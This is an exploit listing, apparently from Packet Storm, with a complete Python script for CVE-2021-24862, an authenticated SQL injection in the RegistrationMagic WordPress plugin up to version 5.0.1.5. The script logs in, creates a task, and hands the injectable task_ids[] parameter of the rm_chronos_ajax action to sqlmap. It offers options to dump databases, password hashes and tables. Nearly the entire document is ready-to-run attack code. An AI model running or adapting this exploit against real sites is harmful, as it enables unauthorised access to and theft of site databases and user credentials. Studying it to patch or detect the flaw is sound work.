
WordPress RegistrationMagic V 5.0.1.5 SQL Injection

2022-01-2700:00:00
Ron Jost
packetstormsecurity.com
wordpress
registrationmagic
sql injection
authenticated
vendor
software
version
cve-2021-24862
cwe-89
ubuntu 20.04
security document
plugin
http
exploit
authorization
injection
form builder
exploit author
user input
sql statement
duplicating tasks
ajax
vulnerability
remote code execution

EPSS

0.765

Percentile

98.3%

# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)
# Date 23.01.2022  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://registrationmagic.com/  
# Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip  
# Version: <= 5.0.1.5  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2021-24862  
# CWE: CWE-89  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md  
  
'''  
Description:  
The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action  
before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.  
'''  
  
# Banner:  
import os  
  
# ASCII-art banner printed once at start-up (purely cosmetic; the string is
# kept verbatim so the output stays identical).
banner = '''  
  
_____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___   
| | | | __|___|_ | |_ |_ | ___|_ | | | . | _|_ |  
| --| | | __|___| _| | | _|_| |_|___| _|_ | . | . | _|  
|_____|\___/|_____| |___|___|___|_____| |___| |_|___|___|___|  
  
[+] RegistrationMagic SQL Injection  
[@] Developed by Ron Jost (Hacker5preme)   
'''  
print(banner)  
import argparse
import json
import random
import shlex
import string
import subprocess
from datetime import datetime

import requests
  
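# User-Input:
# Target, WordPress base path and the credentials of the account used for the
# authenticated part of the exploit. IP, user and password are mandatory; a
# missing one used to surface only later as a TypeError while building URLs.
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str, required=True,
                       help='target host name or IP address')
my_parser.add_argument('-P', '--PORT', type=str, default='80',
                       help='target HTTP port (default: 80)')
my_parser.add_argument('-U', '--PATH', type=str, default='/',
                       help='WordPress base path, e.g. / or /wordpress/ (default: /)')
my_parser.add_argument('-u', '--USERNAME', type=str, required=True,
                       help='WordPress user name')
my_parser.add_argument('-p', '--PASSWORD', type=str, required=True,
                       help='WordPress password')
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
# Every URL below is built as PATH + 'wp-login.php' / 'wp-admin/...', so the
# base path must end with a slash; normalise it here instead of producing
# 'http://host:80/wordpresswp-login.php'.
wp_path = args.PATH if args.PATH.endswith('/') else args.PATH + '/'
username = args.USERNAME
password = args.PASSWORD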
  
  
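print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
# The task editor and the admin-ajax action used below live under wp-admin,
# so a logged-in WordPress session is a precondition for everything else.
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Fetch the login page first so the session already carries whatever cookies
# wp-login.php hands out before the credentials are posted.
check = session.get(auth_url, timeout=15)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body, timeout=15)

# Fail fast if the login did not work; otherwise the task is never created and
# sqlmap is handed an unauthenticated cookie. WordPress marks a successful
# login with a wordpress_logged_in_* cookie, so test for that rather than for
# the HTTP status (wp-login.php re-renders the form with 200 on bad
# credentials).
if not any(name.startswith('wordpress_logged_in') for name in session.cookies.keys()):
    print('[-] Authentication failed (HTTP ' + str(auth.status_code) + ' from wp-login.php) - '
          'check the credentials and the -U path, then retry')
    raise SystemExit(1)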
  
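# Create task to ensure duplicate:
# The injectable AJAX action duplicates existing Chronos tasks, so at least one
# task has to exist. rm_form_id=2 is hard-coded; presumably the target needs a
# RegistrationMagic form with that id - adjust if the edit page 404s.
dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2'

# Header:
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    # Referer mirrors the request URL, including the WordPress base path
    # (it was previously built without wp_path, so it only matched a
    # root-installed WordPress).
    "Referer": "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://" + target_ip,
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1"
}

# Body
body = {
    "rmc-task-edit-form-subbed": "yes",
    "rm-task-slide": "on",
    # Random suffix so repeated runs do not collide on the task name.
    "rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)),
    "rmc_task_description": "fiasfdhb",
    "rmc_rule_sub_time_older_than_age": '',
    "rmc_rule_sub_time_younger_than_age": '',
    "rmc_rule_fv_fids[]": '',
    "rmc_rule_fv_fvals[]": '',
    # Both payment states go out as repeated rmc_rule_pay_status[] fields.
    # A dict literal cannot hold the same key twice (the second entry silently
    # replaced the first), so pass a list - requests encodes it as two fields.
    "rmc_rule_pay_status[]": ["pending", "canceled"],
    "rmc_action_user_acc": "do_nothing",
    "rmc_action_send_mail_sub": '',
    "rmc_action_send_mail_body": ''
}

# Create project
a = session.post(dupl_url, headers=header, data=body, timeout=15)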
  
  
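# SQL-Injection (Exploit):
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
# Injection point: the task_ids[] parameter of the duplicate_tasks_batch
# sub-action of rm_chronos_ajax. The literal 2 is only the base value sqlmap
# appends its payloads to.
exploit_data = 'action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2'

# Generate payload for sqlmap
print ('[+] Payload for sqlmap exploitation:')
# Serialise the authenticated session as a Cookie header value ("a=1; b=2").
# The previous json.dumps()/replace() chain also rewrote ':' and ' ' inside
# cookie values, which corrupts cookies containing those characters.
cookies_session = session.cookies.get_dict()
cookie = '; '.join(name + '=' + value for name, value in cookies_session.items())
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')

# Run sqlmap as an argv list, never through a shell. The cookie values were
# chosen by the target (Set-Cookie) and retrieve_mode is typed in by the
# operator; with os.system() a quote or $(...) in either would run commands
# on the attacker's own machine. shlex.split() keeps the old ability to pass
# several options at once (e.g. "--current-user --current-db").
exploitcode = (
    ['sqlmap', '-u', exploit_url, '--level', '2', '--risk', '2',
     '--data=' + exploit_data, '--cookie=' + cookie]
    + shlex.split(retrieve_mode)
    + ['-p', 'task_ids[]', '-v', '0']
)
try:
    subprocess.run(exploitcode)
except FileNotFoundError:
    # sqlmap is not on PATH; show the equivalent command so the run can be
    # repeated by hand with the already-authenticated cookie.
    print('[-] sqlmap not found in PATH; run it manually:')
    print('    ' + ' '.join(shlex.quote(part) for part in exploitcode))
    raise SystemExit(1)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))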
  